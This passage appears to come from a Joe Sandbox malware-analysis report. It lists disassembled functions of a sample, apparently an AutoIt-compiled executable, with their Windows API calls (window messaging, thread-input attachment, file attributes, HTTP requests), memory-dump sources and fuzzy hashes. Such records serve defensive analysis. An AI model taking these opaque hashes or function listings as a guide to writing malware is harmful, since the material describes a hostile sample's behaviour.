                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F94539
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F9453C
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F94563
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F94586
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F945FE
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00F94648
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00F94663
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00F9467E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00F94692
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00F946AF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 346111dd8db627d7fc272f39641edcfafbda6ec59815159b4cfbbfe504c90ef7
                                                                                                                                                                                                                                                                                        • Instruction ID: 3a916c89af0285325b756860ca32ae4776dc7e29d9c70882d8be371c6a6a511a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 346111dd8db627d7fc272f39641edcfafbda6ec59815159b4cfbbfe504c90ef7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA618175900208AFEB11DFA4CC81EEEB7B9EF19710F10015AFA14E7391D774A946EB50
                                                                                                                                                                                                                                                                                        Function 00F6BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F6BB18
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BB2C
                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00F6BB33
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BB42
                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F6BB54
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BB6D
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BB7F
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BBC4
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BBD9
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BBE4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6a61f04aa22e52d1a3b3653e2f3a15dfca6dd119f44d124de865cba4b8c4ebb7
                                                                                                                                                                                                                                                                                        • Instruction ID: 3938a412c970fafc67d30165f5ec8c08fd217e2ebbee3c5220e042f666ee13be
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a61f04aa22e52d1a3b3653e2f3a15dfca6dd119f44d124de865cba4b8c4ebb7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4317372D05208AFDB109B64DCC8F697BAAEB85366F108016FB05D71A4D7B4A980AF60
                                                                                                                                                                                                                                                                                        Function 00F32FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33007
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4), ref: 00F32D4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: GetLastError.KERNEL32(00FD1DC4,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4,00FD1DC4), ref: 00F32D60
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33013
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3301E
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33029
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33034
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3303F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3304A
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33055
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33060
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3306E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9a293412ce39d2171c5086556cff8193837e64a394f5b7c96353819a95f6d933
                                                                                                                                                                                                                                                                                        • Instruction ID: 12da572c9bf24d0dd9981c426fa25e4f4c7dbbef76813d708628e2325bace98f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a293412ce39d2171c5086556cff8193837e64a394f5b7c96353819a95f6d933
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB11B676500108BFCB81EF94DC82CDD7BA5EF05360F8144A5FA089F222DA35EE51AB90
                                                                                                                                                                                                                                                                                        Function 00F02AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F02AF9
                                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00F02B98
                                                                                                                                                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00F02D7D
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F43A1B
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F43A80
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F43AAD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                        • String ID: close all
                                                                                                                                                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                        • Opcode ID: fe4560fb4fae3404a7aab7b176131b5602d55cb526538ccf27c59ee139b47870
                                                                                                                                                                                                                                                                                        • Instruction ID: a4333a8b0ec00cfe569273bd05540285dffa94e9a763b7294f7b47f23f9da2e6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe4560fb4fae3404a7aab7b176131b5602d55cb526538ccf27c59ee139b47870
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FD16C71B01212DFDB59EF14C849B69FBA0BF44714F1142AEE84A6B292CB35AD12FF50
                                                                                                                                                                                                                                                                                        Function 00F78835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F789F2
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78A06
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F78A30
                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F78A4A
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78A5C
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78AA5
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F78AF5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                        • Opcode ID: d9656ce16fbf6fc3608aad9453547f3e7541c1f4328857f4fb798fd8e3e6e6b3
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e392ae5ef38ba899d24b06c2e85851afc74dcffa498b771011a02c9165c227e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9656ce16fbf6fc3608aad9453547f3e7541c1f4328857f4fb798fd8e3e6e6b3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3181A2729442059BD720EF14C848ABAB7E8BF847A0F54881FF589D7250DF38D946AB53
                                                                                                                                                                                                                                                                                        Function 00F07447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00F074D7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07567: GetClientRect.USER32(?,?), ref: 00F0758D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07567: GetWindowRect.USER32(?,?), ref: 00F075CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07567: ScreenToClient.USER32(?,?), ref: 00F075F6
                                                                                                                                                                                                                                                                                        • GetDC.USER32 ref: 00F46083
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F46096
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F460A4
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F460B9
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F460C1
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F46152
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                        • Opcode ID: cf17ca80783cb6a72e22023df6e86a66e459fb926b34f75b48a953de7d4f1d96
                                                                                                                                                                                                                                                                                        • Instruction ID: debb9328d71df1ffb3187f10a8be167459ce06c6e21bfee30a09e5b172c1264d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf17ca80783cb6a72e22023df6e86a66e459fb926b34f75b48a953de7d4f1d96
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D571E235904209DFCF21DF68CC84AAA7FB1FF86320F14426AED55961A6C7319840FB52
                                                                                                                                                                                                                                                                                        Function 00F9955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetCursorPos.USER32(?), ref: 00F019E1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: ScreenToClient.USER32(00000000,?), ref: 00F019FE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetAsyncKeyState.USER32(00000001), ref: 00F01A23
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetAsyncKeyState.USER32(00000002), ref: 00F01A3D
                                                                                                                                                                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00F995C7
                                                                                                                                                                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00F995CD
                                                                                                                                                                                                                                                                                        • ReleaseCapture.USER32 ref: 00F995D3
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00F9966E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F99681
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00F9975B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                        • Opcode ID: 389683c1c8ec9dbc2f62e4f63549d8296fce63cf81924a15b9accb28a76bee95
                                                                                                                                                                                                                                                                                        • Instruction ID: 82d3a455361eff67ba9ee5d0a66529332994aeade66770cbdf4b9b3f19fa772c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 389683c1c8ec9dbc2f62e4f63549d8296fce63cf81924a15b9accb28a76bee95
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33518971604304AFEB04EF24CC56FAA77E5EB88710F100A1DF995962E2CB759904EB92
                                                                                                                                                                                                                                                                                        Function 00F7CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7CCB7
                                                                                                                                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F7CCDF
                                                                                                                                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F7CD0F
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F7CD67
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 00F7CD7B
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F7CD86
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                        • Opcode ID: 61dc53e02c9522e897ef988ce3cafec65529d8658b5f1bb507f5885cff681170
                                                                                                                                                                                                                                                                                        • Instruction ID: 912fb0c65bb99311093f3c19d5447f3e5bf0722d0c66396e8770ef1eed117472
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61dc53e02c9522e897ef988ce3cafec65529d8658b5f1bb507f5885cff681170
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13314171900608AFD7319F659C88AAB7BFCEF45754B10852FF45AD6200D734DD04ABA2
                                                                                                                                                                                                                                                                                        Function 00F6A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F455AE,?,?,Bad directive syntax error,00F9DCD0,00000000,00000010,?,?), ref: 00F6A236
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,00F455AE,?), ref: 00F6A23D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F6A301
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                        • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                        • Opcode ID: e422ba7e47b3fa454c7e76b9e33ccc9aafc0a81e9e009a5d0e7acc36faf46c0b
                                                                                                                                                                                                                                                                                        • Instruction ID: a77e1bf5cef170ffeac55626e8eb84c492fa0e6825a3d49ddde696ce90189528
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e422ba7e47b3fa454c7e76b9e33ccc9aafc0a81e9e009a5d0e7acc36faf46c0b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB214D7284021EEBCF11ABA0CC06EEE7B79BF18700F044469B515A50A2EB769668FF51
                                                                                                                                                                                                                                                                                        Function 00F629EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 00F629F8
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00F62A0D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F62A9A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
